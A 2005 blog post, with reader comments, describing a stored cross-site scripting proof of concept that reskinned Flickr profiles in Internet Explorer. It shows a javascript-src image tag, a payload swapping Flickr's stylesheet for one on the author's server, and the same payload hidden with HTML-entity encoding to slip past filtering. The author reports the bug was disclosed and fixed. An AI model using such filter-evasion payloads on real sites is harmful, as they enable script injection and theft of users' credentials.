In: , , , , , ,
On: 2005 / 05 / 23 Viewed: 97140 times
Shorter URL for this post: http://ozh.in/6l

If you are using MSIE, here is something to check out : have a look at my Flickr Profile, and compare with another profile. If you are not using MSIE, here is what you are missing : Skinning Flickr with an XSS exploit.

Updated May 27th : Flicker admins fixed this issue so the exploit is no longer possible with MSIE. I'm such a good person sometimes :) Look at the screenshot and explanations anyway :)


Cross Site Scripting with Flickr

The concept is the following : MSIE allows img tags with a javascript src. For example, the following is valid in MSIE and would pop a message box.

  1. <img src="javascript:alert('hello');">

Most of the time, scripts running on servers filter out this kind of trick, because it allows execution of unwanted, possibly malicious, remote code. But most of the time also, scripts don't check every possibility of XSS filter evasion (really interesting read, a bit scary even :)

What I did here is the following :

  • First, I created an extra CSS file for Flickr. Ok, it's not the prettiest layout you can dream of for Flickr, but heh, I was more on the "proof of concept" :)
  • Now, what I wanted to do was adding in my Flickr Profile the following image :
    1. <img src="javascript:document.getElementsByTagName('link')&#91;0&#93;.href='http://planetozh.com/projects/flickr_xss.css';" width="0" height="0">

    This would replace Flickr's CSS location with mine.

  • Of course, Flickr doesn't allow an image with a "javascript" source. So everything was encoded with HTML entities, since at that moment Flickr did not filter them out :
    1. <img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100
    2. &#111&#99&#117&#109&#101&#110&#116&#46&#103&#101&#116&#69&#108&#101
    3. &#109&#101&#110&#116&#115&#66&#121&#84&#97&#103&#78&#97&#109&#101
    4. &#40&#39&#108&#105&#110&#107&#39&#41&#91&#48&#93&#46&#104&#114
    5. &#101&#102&#61&#39&#104&#116&#116&#112&#58&#47&#47&#102&#114&#101
    6. &#110&#99&#104&#102&#114&#97&#103&#102&#97&#99&#116&#111&#114
    7. &#121&#46&#110&#101&#116&#47&#111&#122&#104&#47&#112&#114&#111
    8. &#106&#101&#99&#116&#115&#47&#102&#108&#105&#99&#107&#114&#95
    9. &#120&#115&#115&#46&#99&#115&#115&#39&#59" width=0 height=0>
  • And voilà

This is an harmless (and ugly, ok, I admit) example of Cross Site Scripting, which must be considered potentially harmful : here, I'm just running a javascript bit in an image, but on some situation, you could do much more evil things, especially on Microsoft Internet users (stealing codes and password).

Ok, I'm now warning Flickr's admins about this or they might just kill my account :-P Done, and they fixed it.

Shorter URL

Want to share or tweet this post? Please use this short URL: http://ozh.in/6l

Metastuff

This entry "Cross Site Scripting : Skinning Flickr with MSIE" was posted on 23/05/2005 at 11:34 pm and is tagged with , , , , , ,
Watch this discussion : Comments RSS 2.0.

5 Blablas

  1. RaiL-FleX says:

    Comme tu l'as fait sur le site de Flickr, tu devrais peut être enlever ces explications, pour éviter que des personnes mal intentionnées n'en profitent tant que rien n'a été corrigé :)

  2. Ozh says:

    Boaf… C'est pas pour les 30 mecs qui liront ça ici que ça va empecher les admins de dormir :)
    (je les ai prévenus hier, et c'est izi à corriger)

  3. w0arz says:

    si il n'y avait que celle la !

  4. Frazer says:

    Hello Ozh,
    I am from bangladesh, I am working with a portal as a web developer still my site affected by Cross Site Scripting,
    but i don't know how to solve this, i found your blog also i believe you are expert of this sector . so i am preying you a good solution . plz

    thanks
    — fezo

  5. Ozh says:

    Frazer » Sorry, I'm not.

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Gravatars: Curious about the little images next to each commenter's name ? Go to Gravatar and sign for a free account
Spam: Various spam plugins may be activated. I'll put pins in a Voodoo doll if you spam me.

Read more ?